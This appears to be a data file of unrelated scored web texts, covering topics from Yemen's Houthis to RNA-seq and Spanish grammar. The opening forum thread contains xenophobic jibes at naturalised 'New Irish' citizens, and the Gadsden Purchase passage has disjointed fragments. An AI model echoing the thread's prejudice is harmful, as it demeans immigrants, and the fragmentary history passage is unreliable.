Latest figures show Canada deported 57 Irish citizens in 2012- incl failed Asylum seekers! The number is more than double the total number of Irish citizens the Border Services Agency (CBSA) said it removed from Canada the previous year. In 2011 the agency said it deported 26 Irish nationals, three of whom were failed asylum seekers. And it added that four of the 57 Irish nationals removed in 2012 “were failed refugee claimants”. While the agency did not identify any of the deportees, including failed asylum seekers, a spokesperson said: “Canada has an internationally recognised fair system for providing refuge for those fleeing persecution in their home country. Could be some "New Irish", who, realising that there's richer pickings in Canada, head over there with their shiny new Irish passports. And it added that four of the 57 Irish nationals removed in 2012 “were failed refugee claimants”. While the agency did not identify any of the deportees, including failed asylum seekers, a spokesperson said: “Canada has an internationally recognised fair system for providing refuge for those fleeing persecution in their home country. It seems that the Canadians are deporting Irish People, Catalpa. But where is Rosanna, Ivana, Denise and the other shreeking shills at this outrageous Racism! What sort of people is Shatter lashing out citizenship to at his little soirees? Isn't part of the citizenship deal that you have to stay in the country after getting citizenship? Now, I could be wrong there, but I seem to remember reading it somewhere. So what do these 57 say when they're sent back here? Does it affect there status here? One had his citizenship rescinded. They just don't care as much as you do about racism. You seem to be able to devote an inordinate amount of time to it. Based on your 'evidence'. Well done. Interesting. The ungrateful bustards-after all we've done for them! Where is the evidence they were the New Irish? i bet the were ordinary irish citizens pretending their live are in danger if they return home. I remember in the early days when asylum seekers started coming to Ireland we and people from Poland claiming asylum. Based on the article. Read it. The only reason metro eireann ran with it was because "new Irish" were involved. Read the article. It was new citizens involved. We fell for their lies and awarded them citizenship. The Canadians didn't and deported them back to us. Unfortunately. Read it again. Note - 'some'. No definite numbers, no nationalities, nothing. If you can't read and interpret information you should go back to school. whats this all aboot eh? The racists must have had their meeting tonight. Pity there are so few left. Even sadder is the way they don't have the cop on to realise that posting in packs highlights one of the two main attributes of the racist - fear/cowardice. The other attribute is, of course, ignorance. Stupid post. There's about 600 peolpe on this site right now. Nobody had a meeting. A new thread appeared and people, including yourself, checked it out. And its the only reason you're commenting on it too?
0.999998
ZF TRW leased this 171,000-square-foot office building in the Arboretum Office Park in Farmington Hills. ZF TRW will open its new global electronics headquarters in the Arboretum Office Park in Farmington Hills by the end of the second quarter following a lease of a 171,000-square-foot building. ZF TRW, the active and passive safety technology division of German parent ZF Friedrichshafen AG, signed a lease last week for the Arboretum III office building at 34605 W. 12 Mile Rd., which is owned by Farmington Hills-based Friedman Integrated Real Estate Solutions LLC and Bloomfield Hills-based Kojaian Management Co. The company will keep about 100 employees in a building that it owns at 24175 Research Drive in Farmington Hills and more than 600 employees will move from other locations into the new space in the Arboretum III building, including engineers, technicians and office staff, said John Wilkerson, senior communications manager for ZF TRW. The ZF TRW North American headquarters will remain in Livonia. “The new [global electronics] headquarters will house full component and vehicle testing capability when complete across ZF TRW’s driver assist, occupant safety and RF electronics product lines,” Wilkerson said in an email. The Arboretum III building is just north of I-696 and east of Drake Road. Wilkerson said the move is in response to the need for more office space, laboratory and vehicle testing areas as engineers and technicians are added to the payroll. The Research Drive building will be ZF TRW’s testing and validation area, Wilkerson said. That building is 80,000 square feet, according to CoStar Group Inc., a Washington, D.C.-based real estate information service. A joint venture between Friedman and Kojaian bought four buildings in the Arboretum Office Park almost two years ago for $8 million from New York City-based Petra Capital Management LLC, according to CoStar. The buildings totaled 421,000 square feet. Earlier this month, ZF North America Inc., the Northville-based subsidiary of ZF AG, announced that it would move its headquarters to Livonia. ZF Friedrichshafen AG purchased TRW Automotive in a $12.4 billion deal less than a year ago, one of the largest mergers and acquisitions of 2015. The first sentence in this article has been modified from its original version to more clearly state that the lease is for a new headquarters for ZF TRW's existing global electronics business.
0.999403
I remember when this was a gas station and a car service repair shop. I wonder what it will be next? I've seen a repair shop like that converted here into an eatery.
0.933219
The Gadsden Purchase, known in Mexico as Spanish: Venta de La Mesilla (Sale of La Mesilla), is a 29,670-square-mile (76,800 km2) region of present-day southern Arizona and southwestern New Mexico that the United States acquired from Mexico by the Treaty of Mesilla, which took effect on June 8, 1854. The purchase included lands south of the Gila River and west of the Rio Grande which the U.S. needed to build a transcontinental railroad along a deep southern route, which the Southern Pacific Railroad later completed in 1881–1883. The purchase also aimed to resolve other border issues. The first draft was signed on December 30, 1853, by James Gadsden, U.S. ambassador to Mexico, and by Antonio López de Santa Anna, president of Mexico. The U.S. Senate voted in favor of ratifying it with amendments on April 25, 1854, and then transmitted it to President Franklin Pierce. Mexico's government and its General Congress or Congress of the Union took final approval action on June 8, 1854, when the treaty took effect. The purchase was the last substantial territorial acquisition in the contiguous United States, and defined the Mexico–United States border. In Mexico, topographical officer George W. Hughes reported to Secretary of State John M. Clayton that a railroad across the isthmus was a "feasible and practical" idea. Clayton then instructed Robert P. Letcher, the minister to Mexico, to negotiate a treaty to protect Hargous' rights. The United States' proposal gave Mexicans a 20% discount on shipping, guaranteed Mexican rights in the zone, allowed the United States to send in military if necessary, and gave the United States most-favored-nation status for Mexican cargo fees. This treaty, however, was never finalized. a reduction of the territory to be acquired by 9,000 square miles (23,000 km2) to the final size of 29,670-square-mile (76,800 km2), and dropping the price to $10 million (equivalent to $230 million in 2018 ) from $15 million ($340 million ). The residents of the area gained full US citizenship and slowly assimilated into American life over the next half-century. The principal threat to the peace and security of settlers and travelers in the area was raids by Apache Indians. The US Army took control of the purchase lands in 1854 but not until 1856 were troops stationed in the troubled region. In June 1857 it established Fort Buchanan south of the Gila at the head of the Sonoita Creek Valley. The fort protected the area until it was evacuated and destroyed in July 1861. The new stability brought miners and ranchers. By the late 1850s mining camps and military posts had not only transformed the Arizona countryside; they had also generated new trade linkages to the state of Sonora, Mexico. Magdalena, Sonora, became a supply center for Tubac; wheat from nearby Cucurpe fed the troops at Fort Buchanan; and the town of Santa Cruz sustained the Mowry mines, just miles to the north. The portion of the Southern Pacific in Arizona was originally largely in the Gadsden Purchase but the western part was later rerouted north of the Gila River to serve the city of Phoenix (as part of the agreement in purchasing the EP&SW). The portion in New Mexico runs largely through the territory that had been disputed between Mexico and the United States after the Treaty of Guadalupe Hidalgo had gone into effect, and before the time of the Gadsden Purchase. The Santa Fe Railroad Company also completed a railroad across Northern Arizona, via Holbrook, Winslow, Flagstaff and Kingman in August 1883. These two transcontinental railroads, the Southern Pacific (now part of the Union Pacific Railroad) and the Santa Fe (now part of the BNSF), are among the busiest rail lines in the United States.
0.953912
The southward progress of the Houthis, a northern Yemeni armed group that fought six wars with the administration of the former president, Ali Abdullah Saleh, between 2004 and 2010, has sparked fears that they may plan on seizing the capital, Sanaa. Yet their recent success also points to the complex political environment and shifting power dynamics that the president, Abdel‑Rabbuh Mansour Hadi, has to navigate. The Houthis, a Zaydi revivalist movement—promoting a brand of Islam unique to Yemen that is technically Shia but is not part of the Twelver school predominant in Iran—took an increasingly militant stance after the death of their founder and namesake, Hussein al‑Houthi, at the hands of Yemeni security forces in 2004. During the country's 2011 popular uprising and intra-elite conflict, which eventually brought Mr Saleh down, the group seized control of Saada (a northern province that borders Saudi Arabia and is the Houthis' heartland), where they now in effect run a state within a state. They were subsequently invited to take part in the National Dialogue Conference, a ten‑month series of peace talks held in Sanaa in 2013 and 2014. The invitation was one of the first times the movement's legitimacy had been recognised by either the Yemeni government or the international community. The group have expanded their influence through a political movement under the name Ansar Allah (Partisans of God) since 2011, gaining notice for their political savvy, trading on anti-corruption and good governance rather than religious ideology or sectarianism. Led by Hussein's brother, Abdel‑Malik al‑Houthi, the Houthis have also become a significant hard-power force, winning successive victories against militias loyal to the Hashid, Yemen's most powerful tribal alliance, and Islah, its biggest Sunni Islamist party, in Amran and Al Jawf provinces, which neighbour Saada. Their success has led to fears that the Houthis plan to continue south to Sanaa, although the Houthis deny that they have this intention. Islah and security officials, as well as Mr Hadi himself, have publicly accused the group of being backed by Iran. Yet less widely reported has been the direct threat posed by the group to the continued influence of the Hashid and Islah, an integral part of the Saleh regime before defecting during 2011, when both had hoped to replace Mr Saleh and the ruling General People's Congress (GPC) as the leading political power in the country following the uprising and intra-elite violence of that year. The Hashid, led by the influential Al Ahmar family, have long been seen as leading power brokers in Yemen, with their influence largely predicated on the received wisdom that Hashid militias were a major military force. Islah, which was co-founded by Abdullah al‑Ahmar, the sheikh of the Hashid until his death in 2007, has similarly been seen as relying on the Hashid and Ali Mohsen al‑Ahmar (no relation), a leading military commander with deep ties to radical Sunni Islamists, for hard-power influence. Since early 2014 the Houthis have made steady progress in taking control of Amran, the Hashid heartland that separates Saada from Sanaa, and on July 8th they seized Amran city, just 50 km north of the capital. The Houthis stormed the city, the last outpost of Hashid and Islah influence in the province, capturing and killing Hamid al‑Qushaibi, a military commander widely seen as loyal to Ali Mohsen and whose 310th Armoured Brigade had been openly fighting with the Houthis since June. The attack shook Islah, and heightened fears that the group might continue their march southward, placing Mr Hadi under growing pressure to take the fight to the group. Although Mr Hadi may be happy to see Islah's influence wane, given that it could pose a threat to his position in future, he is probably simultaneously concerned that the Houthis' progress to date has, in part at least, been sponsored by Mr Saleh, a wily political operator who has not forgiven the Al Ahmars, Islah or Ali Mohsen for defecting in 2011. Many in Yemen see the Amran conflict less as a sectarian fight than a struggle for power between the Houthis, Mr Saleh and the GPC on one side, and the Al Ahmars and Islah on the other. If Mr Hadi were to officially declare war against the Houthis he would, in the view of many observers, be taking the side of Islah and the Al Ahmars against a coalition of forces that he is poorly equipped to tackle and which still holds considerable military and political clout. He is likely to be wary of the chances the Yemeni military, already stretched by an ongoing war with al‑Qaida in the Arabian Peninsula in the south, would have against one of the country's most effective fighting forces. Air strikes ordered by the president against Houthi positions in Amran in June were widely seen as an attempt to force a negotiated settlement. The president may also be worried about the impact that declaring war on the Houthis would have on the country's stability and its ongoing political transition. Open conflict between the state and the Houthis would probably derail, possibly entirely, the country's slow-moving political transition. A constitutional referendum is scheduled to be held in early 2015, but the legitimacy of such a poll—and the practicalities of holding the vote—would be severely undermined if the state were at war with the Houthis. Already, tens of thousands of people are reported to have fled the fighting in Amran. In addition, for the referendum to be held at all, the Houthis, as a key voting bloc at the National Dialogue Conference, would have to first sign off on the constitution, currently being drafted, as would the GPC, of which Mr Saleh is still president. Mr Hadi remains hopeful that a combination of international pressure and mediation could cool the conflict. The UN, which has been concerned to support Yemen's political transition, entered the fray on July 11th, with the UN Security Council demanding that the Houthis pull out of Amran. On July 13th the Houthis agreed to do just that, apparently in exchange for a commitment from Mr Hadi that he would appoint a new regional military commander to oversee Amran, a change that was announced on the evening of the same day. Yet the prospect of renewed conflict remains undiminished, with the Hashid and Islah unlikely to take the loss of Amran lightly, and the Houthis buoyed by their recent successes and perhaps willing to push on and strike a killer blow against the Hashid and Islah.
0.991899
I’ve been guilty of borrowing my husband’s razor in a pinch as well. Never again! Not only does using his razor on your legs, underarms, and bikini line wear it out so that it chafes and nicks his baby face—it also exposes skin to viruses (i.e., herpes, and hepatitis B and C), bacteria (i.e., folliculitis), and staph infections (i.e., MRSA). Even if neither of you harbor any of the above viruses nor infections—old, shared razors are prone to bacteria and mold build-up. Plus, an old blade is risky for an infection via nicking skin if the blade becomes dull. You can prevent infections by using your own razor, rinsing it after every use, storing it in a dry place away from shower moisture, and switching to a new blade every 2 weeks.
0.963003
How would you approach the question on: what is the annual global turnover for aircraft maintenance? I would use supply side, probably estimate this for a country and then multiply for the ratio population world / population country (first order approximation - you can deep dive and segment nations based on air traffic and so on...). Consider the labor hours for a major / vs. regular intervention and other cost associated (e.g. materials), quantify them in €/intervention and then decide how many times a year does a airplane goes through this.
0.999992
Help us remove convicted murderer Dylan Doodle Harries facebook profile picture of him and his victim Katrina Evemy as well as his Facebook relationship status that shows he is in a relationship with his late victim. We the family of Katrina Evemy, wish to have to have all ties to her murderer Dylan Harries removed from our lives, his Facebook profile picture is a constant reminder of the monster still having power over his late victim that he cruelly stole from our lives. We have made countless efforts to contact Facebook through emails and reporting the profile and picture of the murderer, with absolutley no support from the social media website. Below is the news article giving a summary of the horrendous attack. ‘Dylan Harries has been found guilty of repeatedly stabbing Katrina Evemy to death in attack that left the toddler covered in her mother’s blood. Swansea Crown Court heard that the 22-year-old carried out the attack after discovering his ‘on-off girlfriend’, 19, had kissed another man. Harries, described by the prosecution as ‘by nature possessive and jealous’, had stolen her phone and secretly texted the man before walking two miles to her house armed with the knife. Katrina spent six days on life support after the attack in Llanelli, south Wales, on April 13, but died in hospital. Mr Harrington said: ‘She got into the house and said that there was blood everywhere. The court heard Katrina kissed Robert Morton on a night out and the pair exchanged numbers – hours after she had rowed with Harries. Harries stole her phone and began texting Mr Morton while pretending to be Katrina. DNA evidence proved Harries was responsible for the bite, and there were distinctive marks from his braces – but he denied murder, claiming he had found her badly injured. #justiceforkatrina needs your help with “Facebook: Remove picture and of murderer and his victim from Facebook #justiceforkatrina”. Join #justiceforkatrina and 13,900 supporters today.
0.999962
How did celebs dress for Wimbledon? From June 25 – July 15, London hosts the world famous Wimbledon tennis tournament, which attracts a whole host of stars and it-girls on its lawn. In the Ralph Lauren VIP suite, celebrities came dressed in their best summer daytime finery.
0.939371
For someone who has always loved playing IF, the first few attempts at programming it can be a giddy thrill. The smallest achievements can provide boundless amusement: "Look! I made some rooms that link together in crazy ways!" That's why many IF authors, especially those who started programming IF during their adolescence (or even before) go through a stage of writing games that do all kinds of really crazy, annoying things. These games are usually brimming with smarmy, smart-assed responses to various fairly ordinary commands, because smart-assed responses are one of the easiest, most fun things for a novice to program. The games often do really annoying things, from a gameplay standpoint, just because those are things their author has just figured out how to do. Mazes are common, as are insta-death puzzles, silly objects/rooms, in-jokes, and self-referential appearances by the author. Design isn't a big consideration, and for that matter neither are consistency, logic, realism, or correct grammar and spelling. All these things take a lot of patience, and the fledgling IF author is way too eager to write the next snarky response to bother with them. Of course, many of these early efforts never see the light of day, something for which their authors find themselves very grateful five or ten years down the line. But some find their way out. Some authors even take the trouble of porting their old efforts so that the games can reach new audiences (Andrew Plotkin's Inhumane is a case in point). I don't know whether Thorfinn's Realm is the product of novice programmers (or a port of such.) It may not really belong to this category of game, but it certainly feels like it does. It's a game that does many things wrong, and has lots of irritating misfeatures and errors, but is still endearing nonetheless for its abundant energy and enthusiasm. I can almost picture the programmers chortling with glee, savoring the oh-so-clever wordplay and hoping some suckers examine the logs in the fireplace so that they can be the target of that zinger. The player who finds it, on the other hand, grimaces for a moment and then moves on (or at least that's what I did). Who had more fun in this scenario? Thorfinn's Realm is full of moments like these, things that are aggravating for the player but which were presumably fun for the authors to create. Now, let me back off a few steps. First of all, I recognize that I'm setting up a strawman in the above paragraph. It is certainly possible that the scenario I describe above is very far from the truth, and that the authors genuinely thought that the in-jokes, self-references, light source puzzle, etc. etc. would really be fun for the player. Not probable, I admit, but possible. Secondly, I can't stay mad at Thorfinn's Realm for long, despite its many flaws. For one thing, in spite of its cracked design and sometimes wobbly English, the game is coded pretty competently. I found very few bugs, aside from the occasional elided description, and lots of verbs and nouns are accounted for in the parser. But more importantly, there's just such a verve to the whole thing. It's a quality much more difficult to put into words than the game's problems are. Something about the gestalt of the whole package -- puzzles, setting, prose, and the rest -- conveys an infectious enthusiasm for the medium of interactive fiction. Come to think of it, that's another quality that Thorfinn's Realm shares with the earliest IF, but a good quality. Those early games had many characteristics whose passing is unlamented, but they also had the bright-eyed excitement of explorers mapping uncharted territory. In capturing the feel of the early days of IF, Thorfinn's Realm finds not just its curse, but its blessing as well. 28th place on the 1999 Annual Interactive Fiction Competition (5th Edition).
0.999988
I have 3 RNAseq libraries samples with 3 replicates each. I wanted to know what are the RNAseq analysis options for doing a three way comparison? I've seen that DEseq can do differential gene expression analysis for two or more samples. I am also interested in differential isoform expression, but Tophat/Cufflinks only does two way comparisons for RNAseq libraries. Will I have to do 3 two-by-two comparisons from Tophat/Cufflinks to do a three way comparison from Tophat/Cufflinks outputs? Or is there an easy method to do three way comparison of RNAseq libraries? I believe the answer to this depends on your experimental design. By definition, a differential expression analysis is a comparison between two states, usually that you expect to have different biological phenotypes/outcomes. If all three of your libraries represent different experimental conditions that you suspect are independent against the dependent library, then the best way to analyze them is pairwise. For my RNA-seq DE analyses, I've done pairwise comparisons for the most part, using DESeq, baySeq, and edgeR, and I looked at: 1. the output of each package, 2. the intersection of any two of the three packages, and 3. the intersection of all three packages. You can get a sense of which of your DE calls are more statistically significant this way. Often, it is worth using more than one method, since they all preprocess and analyze the data in different ways. So yes, you'll likely end up doing 3 pairwise comparisons for these, unless your experimental design is built for GLMs.
0.999997
Add the imperfect subjunctive endings. As you can see, there are two sets of imperfect subjunctive endings. They are completely interchangeable and equally correct. The imperfect subjunctive follows the same general rules as the present subjunctive in terms of when the subjunctive is necessary. The main difference is timing, as the imperfect subjunctive is used when the main verb is in either the preterite or imperfect past tenses. 1. If the verb in the independent clause expresses wishes, emotions, recommendations, possible non-realities, doubts, denial, etc. and is in the preterite, imperfect or conditional tense then the subjunctive verb in the independent clause will be imperfect subjunctive. 2. When the independent clause expresses current emotions, doubts, etc. about something that happened in the past, the verb in the dependent clause will be imperfect subjunctive. 3. When we want to indicate or hope for unlikely or impossible events using the expression "Ojalá" or "Ojalá que" (means roughly "If only..."), the verb following it will be imperfect subjunctive. 4. "If" Clauses. We use the imperfect subjunctive to form a conditional sentence in the past when it follows the word "si" (if) and is combined with the conditional tense. In English, this construction would translate to something along the lines of "If this, then that".